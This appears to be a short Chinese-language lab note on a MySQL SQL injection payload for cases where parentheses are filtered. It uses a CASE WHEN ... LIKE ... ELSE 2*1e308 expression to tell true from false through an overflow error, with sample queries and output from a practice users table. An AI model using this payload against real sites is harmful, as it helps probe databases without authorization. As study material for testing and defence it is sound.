0x00 概要

只能用来证明是注入的方法

因为出现不了 ( )括号, 导致很多函数与方法都使用不了

0x00 记忆方式

case when ‘12345’like’1%’ then’1’else 2*1e308 end

0x01 测试数据

  1. mysql> select user();
  2. +----------------+
  3. | user()         |
  4. +----------------+
  5. | root@localhost |
  6. +----------------+
  7. 1 row in set (0.00 sec)
  1. mysql> select * from users;
  2. +----+----------+------------+
  3. | id | username | password   |
  4. +----+----------+------------+
  5. |  1 | Dumb     | Dumb       |
  6. |  2 | Angelina | I-kill-you |
  7. |  4 | secure   | crappy     |
  8. |  5 | stupid   | stupidity  |
  9. |  7 | batman   | mob!le     |
  10. |  8 | admin    | admin      |
  11. +----+----------+------------+
  12. 6 rows in set (0.00 sec)

0x01 测试

  1. // 正确的情况
  2. // 会返回原来的数据页面保持不变
  3. mysql> select * from users where  id = 1 and case when '12345'like'1%' then'1'else 2*1e308 end;
  4. +----+----------+----------+
  5. | id | username | password |
  6. +----+----------+----------+
  7. |  1 | Dumb     | Dumb     |
  8. +----+----------+----------+
  9. 1 row in set (0.00 sec)
  1. // 错误的情况
  2. // 页面会爆错,如果关闭了错误提示,页面的数据会为空
  3. mysql> select * from users where  id = 1  and case when '12345'like'66%' then'1'else 2*1e308 end;
  4. ERROR 1690 (22003): DOUBLE value is out of range in '(2 * 1e308)'